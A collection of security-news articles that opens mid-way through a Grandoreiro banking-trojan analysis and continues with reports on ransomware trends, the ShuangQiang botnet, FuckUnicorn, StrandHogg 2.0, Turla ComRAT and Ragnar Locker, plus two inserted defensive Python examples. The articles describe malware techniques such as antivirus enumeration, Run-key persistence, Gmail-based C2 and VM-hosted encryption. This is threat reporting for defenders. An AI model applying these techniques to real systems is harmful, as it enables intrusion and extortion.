00CF90DC 'TRAVACaixaGeral'
00CF90F4 'TRAVAMediolanum'
00CF910C 'TRAVAUnicaja'
00CF9124 'TRAVATRIODOS'
00CF913C 'TRAVAACTIVOBANK'
00CF9154 'TRAVACecabank'
00CF916C 'TRAVAACTIVOBANKPT'
00CF9188 'TRAVAMONTEPIOpt'
00CF91A0 'TRAVAnovobancopt'
00CF91BC 'TRAVAsantapt'
00CF91D4 'TRAVAmillenniumbcppt'
00CF91F4 'TRAVACaixadirectapt'
00CF9210 'TRAVAEuroBicpt'
00CF9228 'TRAVACréditoAgrícola'
00CF9248 'TRAVABPI'
00CF925C 'TRAVAPortugalBBVA'
00CF9278 'TRAVABICE'
00CF928C 'TRAVARipley'
00CF92A0 'TRAVABci'
00CF92B4 'TRAVAChile'
00CF92C8 'TRAVABancoEstado'
00CF92E4 'TRAVABancoFalabella'
00CF9300 'TRAVAItaú'
00CF9314 'TRAVASantander'
00CF932C 'TRAVACHILEScotiabank'
00CF934C 'TRAVASGLOBAL'
00CF93EC 'RECORTEcecabank'
00CF9404 'RECORTECTIVOBANK'
00CF9420 'RECORTECaixaGeral'
00CF943C 'RECORTEBBVA'
00CF9450 'RECORTELACAIXA'
00CF9468 'RECORTESTDAESPANHA'
00CF9484 'RECORTEBLOCKCHAIN'
00CF94A0 'RECORTECAJARURAL'
00CF94BC 'RECORTESabadell'
00CF94D4 'RECORTEBANKINTER'
00CF94F0 'RECORTElaboral'
00CF9508 'RECORTEBBANKIA'
00CF9520 'RECORTEcajamar'
00CF9538 'RECORTELiberbank'
00CF9554 'RECORTEOpenbank'
00CF956C 'RECORTEING'
00CF9580 'RECORTEPichincha'
00CF959C 'RECORTEibercaja'
00CF95B4 'RECORTEMediolanum'
00CF95D0 'RECORTEUnicaja'
00CF95E8 'RECORTETRIODOS'
00CF9600 'RECORTEACTIVOBANKPT'
00CF961C 'RECORTEnovobancopt'
00CF9638 'RECORTEMONTEPIOpt'
00CF9654 'RECORTEsantapt'
00CF966C 'RECORTEmillenniumbcppt'
00CF968C 'RECORTECaixadirectapt'
00CF96AC 'RECORTEEuroBicpt'
00CF96C8 'RECORTESCréditoAgrícola'
00CF96E8 'RECORTESBPI'
00CF96FC 'RECORTESPortugalBBVA'
00CF971C 'RECORTEBICE'
00CF9730 'RECORTERipley'
00CF9748 'RECORTEBci'
00CF975C 'RECORTEChile'
00CF9774 'RECORTEBancoEstado'
00CF9790 'RECORTEFalabella'
00CF97AC 'RECORTEItaú'
00CF97C0 'RECORTESantander'
00CF97DC 'RECORTECHILEScotiabank'
00CF97FC 'RECORTESGLOBAL'

As already documented by ESET, the malware has a set of capabilities:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine
  • blocking access to chosen websites

In detail, the malware performs its tasks according to the OS installed on the infected device (label 1, Figure 12). Several target Windows versions can be found inside the malware, namely:

  • Windows 10 Home
  • Windows 8
  • Windows 10
  • Windows Server

Figure 12:  Grandoreiro blocks of code executed during the infection process. All the highlighted labels are described below.

Label 2 shows a call that examines the affected device and creates a folder inside \AppData\Roaming into which new modules can be downloaded and where some data about the target bank portal can be temporarily stored.

Figure 13: The malware uses some in-memory paths that will be created when the target banking portal and victims’ details are collected.

Label 3 in Figure 12 shows where the process of collecting details and browser overlay is initiated. “DetonarProcesso” is Portuguese for “trigger process”. Here the malware starts collecting details about the banking portal when the victim accesses a targeted banking website.

In addition, labels 4 and 5 are the calls responsible for creating the overlay window that will be presented on the victim’s screen.

Finally, label 6 shows that the overlay window presented depends on the target banking organization.

During its execution, Grandoreiro collects some details about the infected device:

  • computer name and username
  • operating system; and
  • list of installed security products, obtained with the WMI query below (the AntiVirusProduct class of the root\SecurityCenter2 namespace).

SELECT * FROM AntiVirusProduct

Interestingly, the malware does not execute when one of two hardcoded computer names is found. These are probably the computer names of the Grandoreiro operators/developers, and the check can be seen as a potential kill switch.

Figure 14: Computer names hardcoded inside the malware.

Grandoreiro capabilities and Latenbot-C2 features

Grandoreiro is a piece of malware that has evolved over time. It can interact with the infected machine, receive commands from the C2, and execute them on the machine, behaving as a simple botnet.

As described by ESET for older variants, and confirmed during this analysis, the malware is capable of:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine; and
  • blocking access to chosen websites

Figure 14: Grandoreiro internal commands (left side) and browser management (right side).

The malware persistence is achieved via a registry key under Windows\CurrentVersion:

Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Value: C:\Users\root\AppData\Roaming\nvreadmm\Inufturiols.exe

An interesting detail in this variant is the C2 communication. The C2 IP address can be seen below, where the name “DANILO” is also visible.

Figure 15: Grandoreiro C2 IP address.

Inside the malware, and based on the web traffic analysis, it’s possible to see similarities with Latenbot C2 traffic (as presented here).

Figure 16: Latenbot  (2017) and Grandoreiro (2020) C2-traffic similarities.

Grandoreiro operators are probably including Latenbot botnet modules as a way of improving communication between the C2 and infected hosts, creating a kind of Grandoreiro botnet.

Figure 17: Grandoreiro C2-traffic.

Grandoreiro PE file padding

As observed in ESET analysis, “the vast majority of Grandoreiro samples utilize a very interesting application of the binary padding technique. This technique is all about making the binaries large and we have seen it being used even by more sophisticated malware. We have also observed some other Latin American banking trojans employing it occasionally, but only in the simplest form of appending a large amount of junk at the end of the binary.

Grandoreiro chooses a different approach – a simple, yet very effective one. The resources section of the PE file is augmented by (usually 3) grande BMP images, making each binary at least 300 MB in size.”

The samples analyzed in May 2020 that target Portuguese users used the technique previously described.

Figure 18 below shows that the resources directory is big and accounts for a large part of the binary size.

Figure 18: PortEx padding analysis – Grandoreiro May 2020.

Three BMP images were specially created by Grandoreiro operators as a way of enlarging the binary file. Notice that the PE file size is 331 MB, of which 322 MB is occupied by the three BMP resources alone (the same technique used by the malware operators in past samples).

Figure 19: BMP resources used by Grandoreiro malware to increase file size and to bypass AV detection.
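A defender-side heuristic for the padding technique described above, added here as example code (not from Pedro Tavares, ESET or PortEx): it parses only the PE section table, no third-party library, and reports how much of the file the resource section occupies, which is where the oversized BMPs live. The size and ratio thresholds, the hypothetical helper names and the synthetic PE built for the demo are assumptions of this example.

```python
"""Heuristic for Grandoreiro-style binary padding in the .rsrc section."""
import struct

SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def parse_sections(data: bytes):
    """Return [(name, size_of_raw_data, pointer_to_raw_data)] for each section."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER starts here
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_opt            # section table follows the optional header
    sections = []
    for i in range(num_sections):
        fields = SECTION_HEADER.unpack_from(data, table + SECTION_HEADER.size * i)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[3], fields[4]))   # SizeOfRawData, PointerToRawData
    return sections


def padding_report(data: bytes, min_size=100 * 1024 * 1024, min_ratio=0.9):
    """Flag a binary whose .rsrc section dominates an unusually large file.

    Thresholds are assumptions of this example (ESET describes >=300 MB samples
    carrying three large BMPs); tune them for your own environment.
    """
    sections = parse_sections(data)
    rsrc = sum(size for name, size, _ in sections if name == ".rsrc")
    ratio = rsrc / len(data) if data else 0.0
    return {
        "file_size": len(data),
        "rsrc_size": rsrc,
        "rsrc_ratio": round(ratio, 3),
        "suspicious": len(data) >= min_size and ratio >= min_ratio,
    }


def build_synthetic_pe(text_size: int, rsrc_size: int) -> bytes:
    """Construct a minimal, non-runnable PE32 with a .text and a .rsrc section.

    Constructed demo input only: it mimics the layout, not a real sample.
    """
    e_lfanew, size_of_opt, num_sections, align = 0x40, 224, 2, 0x200
    headers_len = e_lfanew + 4 + 20 + size_of_opt + SECTION_HEADER.size * num_sections
    headers_size = -(-headers_len // align) * align     # round up to file alignment
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, num_sections, 0, 0, 0, size_of_opt, 0x102)
    opt = bytearray(size_of_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    table, ptr, va = b"", headers_size, 0x1000
    for name, size in ((b".text", text_size), (b".rsrc", rsrc_size)):
        table += SECTION_HEADER.pack(name, size, va, size, ptr, 0, 0, 0, 0, 0x40000040)
        ptr += size
        va += -(-size // 0x1000) * 0x1000
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(headers_size, b"\0")
    # "BM" is the BMP magic, purely cosmetic here; the rest of .rsrc is zero filler.
    return header + b"\0" * text_size + b"BM" + b"\0" * (rsrc_size - 2)


if __name__ == "__main__":
    sample = build_synthetic_pe(20_000, 2_000_000)
    print(padding_report(sample, min_size=1_000_000))
```

On a real file, read it into `data` and call `padding_report(data)` with the default thresholds; the report also serves as a quick triage field for samples that are too large for sandboxes.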

Spam tool

During May 2020 it was observed that many phishing emails targeting Portuguese users were disseminated via a spam tool called Leaf PHPMailer 2.8. Crooks compromise several servers and use tools like this to send malicious emails to a large group of users.

Below is a screenshot from a compromised server we analyzed during this investigation.

Figure 20: Spam tool used by Grandoreiro operators to disseminate malscam campaigns in-the-wild in Portugal.

Finally, the malware server hosting the ISO files, the spam tool, and the C2 had been decommissioned at the time of writing this publication.

Additional details, including the Indicators of Compromise (IOCs), are available in the analysis published by Pedro Tavares.

About the author Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog

Pierluigi Paganini

(SecurityAffairs – Grandoreiro Malware, hacking)

The post Grandoreiro Malware implements new features in Q2 2020 appeared first on Security Affairs.

The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced

The number of ransomware attacks increased by 40 percent last year, according to Group-IB; attackers think bigger and grow more advanced.

Group-IB, a Singapore-based cybersecurity company that specializes in preventing cyberattacks, found that 2019 was marked by ransomware evolution and dominated by increasingly aggressive ransomware campaigns, with operators resorting to more cunning TTPs, reminiscent of those of APT groups, to get their victims to shell out.

The number of ransomware attacks increased by 40 percent last year, according to Group-IB’s incident response engagements and industry researchers’ data, while the devious techniques employed by the attackers helped push the average ransom up more than tenfold in just one year. The greediest ransomware families with the highest pay-off were Ryuk, DoppelPaymer and REvil.

The findings come as highlights of the Group-IB whitepaper titled “Ransomware Uncovered: Attackers’ Latest Methods,” issued today, which closely examines the evolution of the ransomware operators’ strategies over the past year.

Big Game Hunting 

Last year, ransomware operators matured considerably, having joined Big Game Hunting and going beyond file encryption. More groups started distributing ransomware, and Ransomware-as-a-Service (RaaS) adverts opted to focus their attacks on big enterprise networks rather than individuals. TTPs employed by ransomware operators showed that they came to resemble what once was considered a modus operandi of primarily APT groups — last year saw even trusted relationship and supply chain attacks conducted by ransomware operators. 

Another feature that ransomware operators started to share with APT groups was the downloading of sensitive data from victims’ servers. It should be noted, however, that unlike APT groups, which download the info for espionage purposes, ransomware operators downloaded it to then blackmail their victims and increase the chances of the ransom being paid. If their demands were not met, they attempted to sell the confidential information on the black market. This technique was used by REvil, Maze, and DoppelPaymer operators.

Big Game Hunters frequently used different trojans to gain an initial foothold in the target network: in 2019, a wide variety of trojans was used in ransomware campaigns, including Dridex, Emotet, SDBBot, and Trickbot. 

In 2019, most ransomware operators actively used post-exploitation frameworks. For instance, Ryuk, REvil, Maze, and DoppelPaymer actively used such tools, namely Cobalt Strike, CrackMapExec, PowerShell Empire, PoshC2, Metasploit, and Koadic, which helped them collect as much information as possible about the compromised network. Some operators used additional malware during their post-exploitation activities, which gave them more opportunities to obtain authentication data and even full control over Windows domains.

How it all began

In 2019, the majority of ransomware operators used phishing emails, intrusion through external remote services, especially through RDP, and drive-by compromise as initial attack vectors. 

Phishing emails continued to be the most common initial access technique. This technique’s main admirers were Shade and Ryuk. The financially motivated threat actor TA505 also started its Clop ransomware campaigns from a phishing email containing a weaponized attachment that would download FlawedAmmyy RAT or SDBBot, among others.

Last year, the number of accessible servers with an open port 3389 grew to over 3 million, with the majority of them located in China, the United States, Germany, Brazil, and Russia. This attack vector was popularized among cybercriminals by the discovery of five new Remote Desktop Service vulnerabilities, none of which, however, was successfully exploited. Dharma and Scarab operators were the most frequent users of this attack vector.

In 2019, attackers also frequently used infected websites to deliver ransomware. Once a user landed on such a website, they were redirected to websites that attempted to exploit vulnerabilities in, for example, their browsers. The exploit kits most frequently used in these drive-by attacks were RIG EK, Fallout EK, and Spelevo EK.

Some threat actors, such as Shade (Troldesh) and STOP operators, immediately encrypted data on the initially compromised hosts, while many others, including Ryuk, REvil, DoppelPaymer, Maze, and Dharma operators, gathered info about the intruded network, moving laterally and compromising entire network infrastructures.

The full list of the TTPs outlined in the whitepaper can be found in the heat map below, which is based on MITRE’s revolutionary ATT&CK matrix. They are ordered from the most commonly used (red) to the least commonly used (green).

Figure 1 – Heat map of ransomware operators’ TTPs based on MITRE’s ATT&CK matrix


After a relative lull in 2018, 2019 saw ransomware returning at full strength, with the number of ransomware attacks having grown by 40 percent year-on-year. Larger targets meant larger ransoms — the average figure soared from $8,000 in 2018 to $84,000 last year, according to industry researchers. The most aggressive and greediest ransomware families were Ryuk, DoppelPaymer and REvil, whose single ransom demands reached up to $800,000.

“The year of 2019 was marked by ransomware operators enhancing their positions, shifting to larger targets and increasing their revenues, and we have good reason to believe that this year they will celebrate with even greater achievements,” comments Group-IB Senior Digital Forensics Specialist Oleg Skulkin. “Ransomware operators are likely to continue expanding their victim pool, focusing on key industries, which have enough resources to satisfy their appetites. The time has come for each company to decide whether to invest money in boosting their cybersecurity to make their networks inaccessible to threat actors or risk being approached with ransom demand and go down for their security flaws.”

Despite the vigour shown by ransomware operators recently, there are still a number of measures that can be taken to ward off ransomware attacks. They include, among others, using a VPN whenever accessing servers through RDP, creating complex passwords for the accounts used for access via RDP and changing them regularly, restricting the list of IP addresses that can be used to make external RDP connections, and many others. More recommendations can be found in the relevant section of the whitepaper.

Additional details are included in the report “Ransomware Uncovered: Attackers’ Latest Methods” published by Group-IB.

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks, online fraud, IP protection and high-profile cyber investigations. Group-IB’s Threat Intelligence system has been named one of the best in class by Gartner, Forrester, and IDC.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced appeared first on Security Affairs.

Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs

A joint operation conducted by experts from Chinese firms Qihoo 360 Netlab and Baidu dismantled the ShuangQiang botnet, which infected hundreds of thousands of systems.

A joint operation conducted by Chinese security firm Qihoo 360 Netlab and tech giant Baidu disrupted a botnet operated by a group tracked as ShuangQiang (aka Double Gun) that infected hundreds of thousands of systems.

ShuangQiang is financially motivated; it has been active since 2017, targeting Windows computers with MBR and VBR bootkits and installing malicious drivers for financial gain and to hijack web traffic to e-commerce sites.

“Recently, our DNS data based threat monitoring system DNSmon flagged a suspicious domain. The system estimates the scale of infection may well be above hundreds of thousands of users. By analyzing the related samples and C2s,” reads the analysis published by the experts, “we traced its family back to the ShuangQiang (double gun) campaign. In the past, this campaign has been exposed by multiple security vendors, but it has revived and come back with new methods and great force.”

Threat actors were distributing configuration files and malware that were hidden using steganography in images uploaded to Baidu Tieba. The hackers also began using Alibaba Cloud storage to host configuration files and Baidu’s analytics platform Tongji as command infrastructure.

The attack chain leverages game launching software from underground game portals that contain malicious code masqueraded as a patch.

Attackers used two methods to infect victims: one using the game launcher with malicious code, the second releasing and loading a malicious driver.


Upon downloading and installing the alleged patch from an underground game server, the victim accesses the configuration information to download another program named “cs.dll” from Baidu Tieba that’s stored as an image file. Then the “cs.dll” creates a bot ID and contacts the C2, then it injects a second driver that hijacks system processes (e.g., lassas.exe and svchost.exe) to download next-stage payloads.

“The driver will copy itself to Windows/system32/driver/{7 random letters}.sys to disguise itself as a legitimate driver, such as fltMgr.sys, and inject a DLL module into the system processes Lassas.exe and svchost.exe.” continues the report. “After the entire initialization process is completed, a driver and DLL module work together to complete the work mode through DeviceIoControl(), which is a driver-level downloader. All sensitive configuration information is stored inside the driver.”

In the second attack chain detailed by the researchers, the attackers leverage DLL hijacking to force game client software into loading malicious DLL files using the same name.

Threat actors altered the software using a modified version of photobase.dll, which is used by multiple underground game client software.

Experts from Qihoo 360 Netlab reported their findings to Baidu on May 14, and the two firms launched a joint operation to block the botnet by tracking all the URLs used by the attackers.

“During this joint action, we had a better understanding on double gun gang’s technical means, logic, and rules, by sharing, analysing, and responding to the related threat intelligence.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – ShuangQiang, hacking)

The post Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs appeared first on Security Affairs.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign uses messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest in the contact tracing app Immuni, which was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT that shared samples with the malware community.

The email messages used as a lure are written in Italian and inform citizens of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against the COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (

The attackers registered the “,“ domain to trick victims.

The content of the email includes download links and contact information that mixes email addresses of the attacker with those of FOFI.

Upon execution, the malware displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background, FuckUnicorn starts encrypting data on the system; it encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) with these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas, .db, .torrent

The malicious code adds the “.fuckunicornhtrhrtjrjy” extension to the names of encrypted files.

FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300 worth of Bitcoin within three days or the data will be lost.

The email address in the ransom note is invalid, making it impossible to send the attacker proof of payment.

At the time of writing, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password used to encrypt the files is sent in clear text to the attacker, which means it can be retrieved from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

StrandHogg 2.0 Android flaw affects over 1 Billion devices

Researchers disclosed a new critical vulnerability (CVE-2020-0096, aka StrandHogg 2.0) affecting the Android operating system that could allow attackers to carry out a sophisticated version of Strandhogg attack.

A group of Norwegian researchers disclosed a critical flaw, tracked as CVE-2020-0096, affecting Android OS that could allow attackers to carry out a sophisticated version of the Strandhogg attack.

In December, security experts at Promon disclosed a vulnerability, dubbed StrandHogg, that has been exploited by tens of malicious Android apps.

The name StrandHogg comes from an old Norse term that refers to a tactic adopted by the Vikings that consists of raiding coastal areas to plunder and hold people for ransom.

The vulnerability resides in Android’s multitasking system and could be exploited by a rogue application installed on the device to pose as a legitimate application in an attempt to harvest elevated permissions from the victims.

A rogue Android app could use the StrandHogg tactic to trick the user into granting it the permissions to control the devices.

The permissions granted to the app could allow spying on the user by accessing the camera and microphone, obtaining the device’s location, reading the SMSs, capturing login credentials (including 2FA codes via SMS), accessing private photos and videos, accessing contacts and call logs, and also making calls and recording the victim’s conversations.

The same team of Norwegian researchers that discovered StrandHogg has now reported the CVE-2020-0096 flaw, which they call StrandHogg 2.0. The ‘StrandHogg 2.0’ vulnerability affects all Android devices except those running Android Q/10, meaning that 80%-85% of Android devices are exposed.

The Strandhogg 2.0 flaw is an elevation of privilege flaw that allows hackers to gain access to almost all apps installed on the devices.

While StrandHogg 1.0 could be used to attack apps one at a time, StrandHogg 2.0 allows attackers to “dynamically attack nearly any app on a given device simultaneously at the touch of a button,” all without requiring pre-configuration for each targeted app.

“If the victim then inputs their login credentials within this interface, those sensitive details are immediately sent to the attacker, who can then login to, and control, security-sensitive apps,” Promon says.

“Utilizing StrandHogg 2.0, attackers can, once a malicious app is installed on the device, gain access to private SMS messages and photos, steal victims’ login credentials, track GPS movements, make and/or record phone conversations, and spy through a phone’s camera and microphone.”


Targeted users cannot spot the StrandHogg attack, which can be exploited without root access and works on all versions of Android.

The new flaw can be used for various types of phishing attack, such as displaying a fake login screen, gathering different types of sensitive information, denial of service, and/or collecting permissions under the guise of the target app (such as SMS, GPS positioning and more).

Experts reported the flaw to Google in December; the tech giant released a security patch to device manufacturers in April 2020, and they are going to release security updates for their devices.

Below is the PoC video released by the experts:

Pierluigi Paganini

(SecurityAffairs – StrandHogg 2.0 , hacking)

The post StrandHogg 2.0 Android flaw affects over 1 Billion devices appeared first on Security Affairs.

New Turla ComRAT backdoor uses Gmail for Command and Control

Researchers uncovered a new advanced variant of Turla’s ComRAT backdoor that leverages Gmail’s web interface as C2 infrastructure.

Cybersecurity researchers discovered a new version of the ComRAT backdoor, also known as Agent.BTZ, which is a malware that was employed in past campaigns attributed to the Turla APT group.

Earlier versions of Agent.BTZ were used to compromise US military networks in the Middle East in 2008.

The new variant leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.

ComRAT v4 appeared in the threat landscape in 2017 and is still used by threat actors; recently a new variant was used in attacks against two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.


This new version was developed from scratch and is far more complex than its predecessors. 

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

ComRAT is a sophisticated backdoor developed in C++; it can perform many malicious actions on the infected systems, such as executing additional payloads or exfiltrating files.

The backdoor uses a Virtual File System formatted in FAT16; it is deployed using existing access methods, including the PowerStallion PowerShell backdoor.

ComRAT leverages the following C2 channels:

  • HTTP: It uses exactly the same protocol as ComRAT v3
  • Email: It uses the Gmail web interface to receive commands and exfiltrate data

The main components of ComRAT v4 are:

  • an orchestrator, which is injected into the explorer.exe process and is used to control most of ComRAT’s functions.
  • a communication module (a DLL), which is injected into the default browser by the orchestrator. It communicates with the orchestrator using a named pipe.
  • a Virtual FAT16 File System, containing the configuration and the logs files.

“The main use of ComRAT is discovering, stealing and exfiltrating confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents.” reads the report published by the experts.

To evade detection, ComRAT files, with the exception of the orchestrator DLL and the scheduled task used for persistence, are stored in a virtual file system (VFS). The default VFS container file is hardcoded in the orchestrator component, which drops it the first time it is executed.

The C&C “mail” mode was specific to the Gmail email provider.

The orchestrator reads the email address in /etc/transport/mail/mailboxes/0/command_addr and the cookies used to authenticate on Gmail in /etc/transport/mail/mailboxes/0/cookie, then parses the inbox HTML page (using the Gumbo HTML parser). The cookies have a limited lifetime, so they need to be updated after each interaction.

The Gmail parser could get the list of emails with subject lines that match those in a “subject.str” file in the VFS.

The ComRAT backdoor downloads the attachments (e.g. “document.docx,” “documents.xlsx”) from each email that meets the above criteria, then deletes the emails to avoid processing them twice.

Despite their extensions, the attachments are not Office documents, but rather encrypted blobs of data that include a specific command to be executed.

The backdoor creates an attachment containing the result of the commands; its name consists of 20 random digits followed by the so-called double extension .jpg.bfe.

The analysis of the time of day that commands were sent in a one-month period reveals that the operators are working in the UTC+3 or UTC+4 time zone.
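The reasoning behind that time-zone estimate, written out as an added example (not code from the Security Affairs post or from ESET’s ComRAT report): shift the UTC hour of every command by each candidate offset and keep the offsets that place the most activity inside an ordinary working day. The working-hours window and the command timestamps are constructed for the demo, not real ComRAT telemetry.

```python
"""Estimate an operator's working time zone from command timestamps."""
from datetime import datetime, timezone

# Assumed local working window, 09:00-17:59; an assumption of this example.
WORK_START, WORK_END = 9, 18

# Constructed UTC timestamps of "commands" over one month, standing in for the
# dataset the report refers to. Not real ComRAT data.
SAMPLE_COMMAND_TIMES = [
    datetime(2020, 1, day, hour, 0, tzinfo=timezone.utc)
    for day, hour in [(6, 5), (7, 6), (8, 6), (9, 7), (10, 7), (13, 8), (14, 8),
                      (15, 9), (16, 10), (17, 11), (20, 12), (21, 13), (22, 14), (23, 14)]
]


def score_offsets(timestamps, candidates=range(-12, 15)):
    """Map each candidate UTC offset (whole hours) to the number of commands
    that land inside the working window once shifted by that offset."""
    utc_hours = [t.astimezone(timezone.utc).hour for t in timestamps]
    return {
        off: sum(WORK_START <= (h + off) % 24 < WORK_END for h in utc_hours)
        for off in candidates
    }


def estimate_operator_offsets(timestamps, tolerance=0):
    """Return the offsets whose score is within `tolerance` commands of the best.

    A tolerance of 1 usually yields the two-hour band (e.g. UTC+3/UTC+4) that
    time-of-day analysis alone cannot separate, which is why such reports
    state a range rather than a single zone.
    """
    scores = score_offsets(timestamps)
    best = max(scores.values())
    return sorted(off for off, s in scores.items() if s >= best - tolerance)


if __name__ == "__main__":
    scores = score_offsets(SAMPLE_COMMAND_TIMES)
    for off in sorted(scores, key=scores.get, reverse=True)[:5]:
        print(f"UTC{off:+d}: {scores[off]} of {len(SAMPLE_COMMAND_TIMES)} commands in working hours")
    print("Likely operator zone(s):", estimate_operator_offsets(SAMPLE_COMMAND_TIMES, tolerance=1))
```

With real data, weekday versus weekend activity gives a second, independent signal that can narrow the band further.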

“Version four of ComRAT is a totally revamped malware family released in 2017,” ESET concludes. “Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Pierluigi Paganini

(SecurityAffairs – Tesla, hacking)

The post New Turla ComRAT backdoor uses Gmail for Command and Control appeared first on Security Affairs.

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor. Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”. Sarwent’s new capabilities Sarwent … More

The post Malware opens RDP backdoor into Windows systems appeared first on Help Net Security.

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victims’ files; the trick allows it to evade detection by security software.

Crooks always devise new techniques to evade detection; Ragnar Locker is deploying Windows XP virtual machines to encrypt victims’ files while bypassing security measures.

Ragnar Locker appeared relatively recently in the threat landscape; at the end of 2019 it was employed in attacks against corporate networks.

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting, this sample of Ragnar Locker terminates security programs and managed service provider (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.


The malware leverages a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine. The virtual machine mounts the shared paths as network drives from the \\VBOXSVR virtual computer to access their content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file allows the threat to scan for local drives and mapped network drives on the host and build a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers then launch the Windows XP virtual machine using the SharedFolder directives created by their batch file.

When launched, all of these shared drives are accessible from within the virtual machine. Experts pointed out that the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

Windows XP virtual machine (Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

